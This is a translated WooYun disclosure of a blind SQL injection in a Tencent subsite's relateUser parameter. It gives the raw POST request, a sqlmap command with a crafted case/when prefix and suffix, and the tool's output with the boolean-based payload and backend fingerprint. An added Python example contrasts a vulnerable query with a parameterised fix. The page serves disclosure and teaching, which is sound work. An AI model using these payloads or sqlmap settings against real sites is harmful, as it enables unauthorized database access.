Defect ID: WooYun-2015-0123831
Title: SQL injection on a Tencent subsite
Vendor: Tencent
Author: Jannock
Submitted: 2015-07-01 07:33
Published: 2015-08-15 14:54
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Confirmed by vendor
Tags:
2015-07-01: Details sent to the vendor, awaiting vendor handling
2015-07-01: Vendor has confirmed; details disclosed to the vendor only
2015-07-11: Details disclosed to core white hats and domain experts
2015-07-21: Details disclosed to regular white hats
2015-07-31: Details disclosed to intern white hats
2015-08-15: Details disclosed to the public
SQL injection on a Tencent subsite; it is a blind injection.
POST /user/delcontent? HTTP/1.1
Host: gad.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

id=8&relateUser=243&showType=1

The relateUser parameter is vulnerable to SQL injection.
python sqlmap.py -u "http://localhost/1.php?s=24397" -p s --prefix "24397 and 1=(case when(1=1" --suffix ") then 1 else (select 1 union select 2) end)" --technique=B --dbms=mysql

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150403}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|     |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:52:31

[23:52:31] [INFO] testing connection to the target URL
[23:52:31] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:52:32] [INFO] target URL is stable
[23:53:02] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[23:53:33] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[23:53:47] [WARNING] heuristic (basic) test shows that GET parameter 's' might not be injectable
[23:53:52] [INFO] testing for SQL injection on GET parameter 's'
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] n
[23:53:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:54:15] [INFO] GET parameter 's' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[23:54:15] [INFO] checking if the injection point on GET parameter 's' is a false positive
[23:54:35] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
GET parameter 's' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 10 HTTP(s) requests:
---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=24397 and 1=(case when(1=1 AND 8352=8352) then 1 else (select 1 union select 2) end)
---
[23:54:38] [INFO] testing MySQL
[23:54:44] [INFO] confirming MySQL
[23:55:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[23:56:02] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[23:56:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.2
Suggested fix: filter the input.
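The following is an added example, not code from the report, from sqlmap or from the Tencent site. It models the kind of ownership check a request like the one above must run (the content table, its column names and the function names are assumptions, and an in-memory SQLite database stands in for the MySQL backend), first as the string-built query that lets the relateUser value alter the statement, then hardened by whitelisting the parameter as a plain integer and binding it. A boolean-based blind probe pair (a true condition and the same condition made false) shows why the vulnerable form leaks an oracle and the hardened form does not.

```python
"""
Added example (not the report's or the site's code): a content-ownership
check shown as a vulnerable string-built query and as a hardened,
validated and parameterised query. Table and column names are assumed;
the sample rows are constructed.
"""
import sqlite3
from typing import Callable, Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the real backing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE content (id INTEGER, relate_user INTEGER, show_type INTEGER)"
    )
    conn.executemany(
        "INSERT INTO content VALUES (?, ?, ?)",
        [(8, 243, 1), (9, 243, 1), (10, 500, 1)],
    )
    conn.commit()
    return conn


def owns_content_vulnerable(conn: sqlite3.Connection,
                            content_id: str, relate_user: str) -> bool:
    """String-built query: the attacker-controlled value becomes part of the SQL."""
    sql = "SELECT COUNT(*) FROM content WHERE id=%s AND relate_user=%s" % (
        content_id, relate_user)
    return conn.execute(sql).fetchone()[0] > 0


def parse_int_param(value: str) -> Optional[int]:
    """Whitelist validation: the ids in this request are plain decimal integers."""
    if value.isdecimal():
        return int(value)
    return None


def owns_content_hardened(conn: sqlite3.Connection,
                          content_id: str, relate_user: str) -> bool:
    """Validate, then bind: the value can never change the statement's structure."""
    cid = parse_int_param(content_id)
    uid = parse_int_param(relate_user)
    if cid is None or uid is None:
        return False  # reject the request instead of stripping characters
    row = conn.execute(
        "SELECT COUNT(*) FROM content WHERE id=? AND relate_user=?", (cid, uid)
    ).fetchone()
    return row[0] > 0


# A boolean-based blind probe pair of the kind sqlmap sends: one condition that
# is true and the same condition made false. A handler that answers the two
# differently exposes the oracle that blind injection relies on.
TRUE_PROBE = "243 and 1=1"
FALSE_PROBE = "243 and 1=2"


def oracle_leaks(check: Callable[[sqlite3.Connection, str, str], bool]) -> bool:
    """True when the handler answers the true and false probes differently."""
    conn = make_db()
    return check(conn, "8", TRUE_PROBE) != check(conn, "8", FALSE_PROBE)


if __name__ == "__main__":
    print("vulnerable handler leaks an oracle:", oracle_leaks(owns_content_vulnerable))
    print("hardened handler leaks an oracle:  ", oracle_leaks(owns_content_hardened))
```

Character filtering of the kind the sqlmap warning above reveals (the '>' being dropped) only narrows the attacker's syntax, as the case/when payload on this page demonstrates; the parameterised query removes the injection regardless of which characters get through, and the integer whitelist rejects the malformed request before any SQL runs.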
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-07-01 14:53
Thank you very much for your report. The issue is already being handled; thanks to everyone for their attention to the security of Tencent's business. If you have any questions, feel free to send feedback and we will have a dedicated person follow up.
Assessment: none yet.
Uh, 一哥 is here farming reports again http://www.wooyun.org/bugs/wooyun-2015-0123526/trace/304eb21b5a77f36aee296c86ea2dc197 requesting review @疯狗
Why does it feel like Tencent has even more SQL injections than we do?
@盛大网络 Clearly you have the most.
@盛大网络 Right now 一哥 is looking at that sentence of yours and slowly smiling.
@盛大网络 Tomorrow 一哥 will be all over you.
@盛大网络 Sit back and wait to get popped.
@盛大网络 The vendor is having fun too.
@盛大网络 Probably because there is no challenge, or because basically nobody uses Shanda products.
@盛大网络 The fact is, though, that Shanda isn't on 一哥's monitoring list.
Is the vendor asking to get popped?